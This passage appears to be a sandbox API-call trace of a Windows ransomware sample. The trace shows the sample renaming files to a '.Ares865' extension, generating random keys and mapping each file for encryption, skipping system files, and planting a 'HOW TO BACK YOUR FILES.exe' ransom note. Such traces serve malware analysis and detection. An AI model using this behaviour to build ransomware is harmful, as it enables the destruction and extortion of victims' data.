| out: lpFileSize=0x2cce090*=27) returned 1 [0133.165] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.165] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.165] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.166] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.167] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.169] lstrcpyW (in: lpString1=0x2cce460, lpString2="MST7" | out: lpString1="MST7") returned="MST7" [0133.169] lstrlenW (lpString="MST7") returned 4 [0133.169] lstrlenW (lpString="Ares865") returned 7 [0133.169] lstrlenW (lpString=".dll") returned 4 [0133.169] lstrlenW (lpString=".lnk") returned 4 [0133.170] lstrlenW (lpString=".ini") returned 4 [0133.170] lstrlenW (lpString=".sys") returned 4 [0133.170] lstrlenW (lpString="MST7") returned 4 [0133.170] lstrlenW (lpString="bak") returned 3 [0133.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.Ares865") returned 60 [0133.170] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7.ares865"), dwFlags=0x1) returned 1 [0133.171] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.171] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.172] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.174] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.175] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.175] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.175] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.176] lstrcpyW (in: lpString1=0x2cce460, lpString2="MST7MDT.Ares865" | out: lpString1="MST7MDT.Ares865") returned="MST7MDT.Ares865" [0133.176] lstrlenW (lpString="MST7MDT.Ares865") returned 15 [0133.176] lstrlenW (lpString="Ares865") returned 7 [0133.176] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.176] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746ac100, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746ac100, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PST8", cAlternateFileName="")) returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="aoldtz.exe") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2=".") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="..") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="windows") returned -1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="bootmgr") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="temp") returned -1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="pagefile.sys") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="boot") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="ids.txt") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="ntuser.dat") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="perflogs") returned 1 [0133.176] lstrcmpiW (lpString1="PST8", lpString2="MSBuild") returned 1 [0133.177] lstrlenW (lpString="PST8") returned 4 [0133.177] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.Ares865") returned 63 [0133.177] lstrcpyW (in: lpString1=0x2cce460, lpString2="PST8" | out: lpString1="PST8") returned="PST8" [0133.177] lstrlenW (lpString="PST8") returned 4 [0133.177] lstrlenW (lpString="Ares865") returned 7 [0133.177] lstrlenW (lpString=".dll") returned 4 [0133.177] lstrlenW (lpString=".lnk") returned 4 [0133.177] lstrlenW (lpString=".ini") returned 4 [0133.177] lstrlenW (lpString=".sys") returned 4 [0133.177] lstrlenW (lpString="PST8") returned 4 [0133.177] lstrlenW (lpString="bak") returned 3 [0133.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.Ares865") returned 60 [0133.177] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8.ares865"), dwFlags=0x1) returned 1 [0133.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.180] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.180] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.181] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.181] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.181] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.184] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.184] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.186] lstrcpyW (in: lpString1=0x2cce460, lpString2="PST8PDT" | out: lpString1="PST8PDT") returned="PST8PDT" [0133.186] lstrlenW (lpString="PST8PDT") returned 7 [0133.186] lstrlenW (lpString="Ares865") returned 7 [0133.186] lstrlenW (lpString=".dll") returned 4 [0133.186] lstrcmpiW (lpString1="PST8PDT", lpString2=".dll") returned 1 [0133.186] lstrlenW (lpString=".lnk") returned 4 [0133.186] lstrcmpiW (lpString1="PST8PDT", lpString2=".lnk") returned 1 [0133.186] lstrlenW (lpString=".ini") returned 4 [0133.186] lstrcmpiW (lpString1="PST8PDT", lpString2=".ini") returned 1 [0133.186] lstrlenW (lpString=".sys") returned 4 [0133.186] lstrcmpiW (lpString1="PST8PDT", lpString2=".sys") returned 1 [0133.186] lstrlenW (lpString="PST8PDT") returned 7 [0133.186] lstrlenW (lpString="bak") returned 3 [0133.186] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.Ares865") returned 63 [0133.186] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt.ares865"), dwFlags=0x1) returned 1 [0133.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8PDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8pdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.188] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0133.188] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.189] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0133.191] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0133.191] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.193] lstrcpyW (in: lpString1=0x2cce460, lpString2="YST9" | out: lpString1="YST9") returned="YST9" [0133.193] lstrlenW (lpString="YST9") returned 4 [0133.193] lstrlenW (lpString="Ares865") returned 7 [0133.193] lstrlenW (lpString=".dll") returned 4 [0133.193] lstrlenW (lpString=".lnk") returned 4 [0133.193] lstrlenW (lpString=".ini") returned 4 [0133.193] lstrlenW (lpString=".sys") returned 4 [0133.193] lstrlenW (lpString="YST9") returned 4 [0133.193] lstrlenW (lpString="bak") returned 3 [0133.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.Ares865") returned 60 [0133.193] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9.ares865"), dwFlags=0x1) returned 1 [0133.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.195] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.195] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.196] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.196] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.196] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.198] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.199] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.199] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.199] lstrcpyW (in: lpString1=0x2cce460, lpString2="YST9YDT" | out: lpString1="YST9YDT") returned="YST9YDT" [0133.199] lstrlenW (lpString="YST9YDT") returned 7 [0133.200] lstrlenW (lpString="Ares865") returned 7 [0133.200] lstrlenW (lpString=".dll") returned 4 [0133.200] lstrcmpiW (lpString1="YST9YDT", lpString2=".dll") returned 1 [0133.200] lstrlenW (lpString=".lnk") returned 4 [0133.200] lstrcmpiW (lpString1="YST9YDT", lpString2=".lnk") returned 1 [0133.200] lstrlenW (lpString=".ini") returned 4 [0133.200] lstrcmpiW (lpString1="YST9YDT", lpString2=".ini") returned 1 [0133.200] lstrlenW (lpString=".sys") returned 4 [0133.200] lstrcmpiW (lpString1="YST9YDT", lpString2=".sys") returned 1 [0133.200] lstrlenW (lpString="YST9YDT") returned 7 [0133.200] lstrlenW (lpString="bak") returned 3 [0133.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.Ares865") returned 63 [0133.200] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt.ares865"), dwFlags=0x1) returned 1 [0133.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2288) returned 1 [0133.202] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.203] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x170 [0133.204] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0133.205] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.205] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.205] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.206] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific" [0133.206] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific" [0133.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0133.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\how to back your files.exe"), bFailIfExists=1) returned 0 [0133.207] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0133.208] GetLastError () returned 0x0 [0133.208] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0133.208] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52a2f660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52a2f660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0133.208] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.208] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0133.208] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52a2f660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52a2f660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.208] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.208] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0133.208] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.208] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.208] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x238, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apia", cAlternateFileName="")) returned 1 [0133.208] lstrcmpiW (lpString1="Apia", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.208] lstrcmpiW (lpString1="Apia", lpString2="aoldtz.exe") returned 1 [0133.208] lstrcmpiW (lpString1="Apia", lpString2=".") returned 1 [0133.208] lstrcmpiW (lpString1="Apia", lpString2="..") returned 1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="windows") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="bootmgr") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="temp") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="pagefile.sys") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="boot") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="ids.txt") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="ntuser.dat") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="perflogs") returned -1 [0133.209] lstrcmpiW (lpString1="Apia", lpString2="MSBuild") returned -1 [0133.209] lstrlenW (lpString="Apia") returned 4 [0133.209] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\*") returned 49 [0133.209] lstrcpyW (in: lpString1=0x2cce460, lpString2="Apia" | out: lpString1="Apia") returned="Apia" [0133.209] lstrlenW (lpString="Apia") returned 4 [0133.209] lstrlenW (lpString="Ares865") returned 7 [0133.209] lstrlenW (lpString=".dll") returned 4 [0133.209] lstrlenW (lpString=".lnk") returned 4 [0133.209] lstrlenW (lpString=".ini") returned 4 [0133.209] lstrlenW (lpString=".sys") returned 4 [0133.209] lstrlenW (lpString="Apia") returned 4 [0133.209] lstrlenW (lpString="bak") returned 3 [0133.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.Ares865") returned 60 [0133.209] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia.ares865"), dwFlags=0x1) returned 1 [0133.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=568) returned 1 [0133.211] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.212] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x540, lpName=0x0) returned 0x170 [0133.214] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x540) returned 0x190000 [0133.214] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.216] lstrcpyW (in: lpString1=0x2cce460, lpString2="Auckland" | out: lpString1="Auckland") returned="Auckland" [0133.216] lstrlenW (lpString="Auckland") returned 8 [0133.216] lstrlenW (lpString="Ares865") returned 7 [0133.216] lstrcmpiW (lpString1="uckland", lpString2="Ares865") returned 1 [0133.216] lstrlenW (lpString=".dll") returned 4 [0133.216] lstrcmpiW (lpString1="Auckland", lpString2=".dll") returned 1 [0133.216] lstrlenW (lpString=".lnk") returned 4 [0133.216] lstrcmpiW (lpString1="Auckland", lpString2=".lnk") returned 1 [0133.216] lstrlenW (lpString=".ini") returned 4 [0133.216] lstrcmpiW (lpString1="Auckland", lpString2=".ini") returned 1 [0133.216] lstrlenW (lpString=".sys") returned 4 [0133.216] lstrcmpiW (lpString1="Auckland", lpString2=".sys") returned 1 [0133.216] lstrlenW (lpString="Auckland") returned 8 [0133.216] lstrlenW (lpString="bak") returned 3 [0133.216] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.Ares865") returned 64 [0133.216] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland.ares865"), dwFlags=0x1) returned 1 [0133.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1348) returned 1 [0133.218] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 